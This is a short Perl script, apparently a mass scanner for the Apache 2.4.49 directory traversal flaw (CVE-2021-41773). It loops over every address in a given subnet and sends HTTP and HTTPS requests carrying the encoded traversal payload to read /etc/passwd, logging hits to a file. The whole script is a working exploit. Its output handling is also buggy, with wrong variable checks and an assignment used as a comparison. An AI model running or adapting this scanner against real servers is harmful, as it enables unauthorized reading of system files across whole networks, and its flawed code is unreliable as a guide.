#!/usr/bin/env perl
# Apache 2.4.49 Directory Traversal Vulnerability (CVE-2021-41773)
# https://isc.sans.edu/diary/Apache+2449+Directory+Traversal+Vulnerability+CVE202141773/27908
# [1] https://httpd.apache.org/security/vulnerabilities_24.html
# [2] https://www.kb.cert.org/vuls/id/111677
# written by bleu@brainforcesolutions.com

use strict;

my $subnet = $ARGV[0];
my $prn_flag = 0;

if ($subnet == " ") {
    print "\nExample: $0 192.168.0\n\n";
    exit 0;
}

open (FH, '>', 'output.txt');

for (my $i = 1; $i <= 254; $i++) {
   $subnet = $subnet.".".$i;
   print("Scaning host: $subnet\n");

   my $http_cmd = `GET -t 20 http://$subnet/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1`;

   if ($http_cmd) {
       if ($_ =~ /<(.+)>/) {
           $prn_flag = 0;
       }
       elsif ($_ =~ /^\<\/(.+)>/) {
           $prn_flag = 1;
           print $_ if ($prn_flag = 1);
	   print FH $subnet."\n";
	   print FH $_;
       }
   }

   my $https_cmd = `GET -t 20 https://$subnet/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1`;
   
   if ($https_cmd) {
      if ($_ =~ /<(.+)>/) {
	  $prn_flag = 0;
      }
      elsif ($_ =~ /^\<\/(.+)>/) {
	  $prn_flag = 1;
	  print $_ if ($prn_flag = 1);
	  print FH $subnet."\n";
	  print FH $_;
      }
   }
   $subnet = $ARGV[0];
}

close (FH);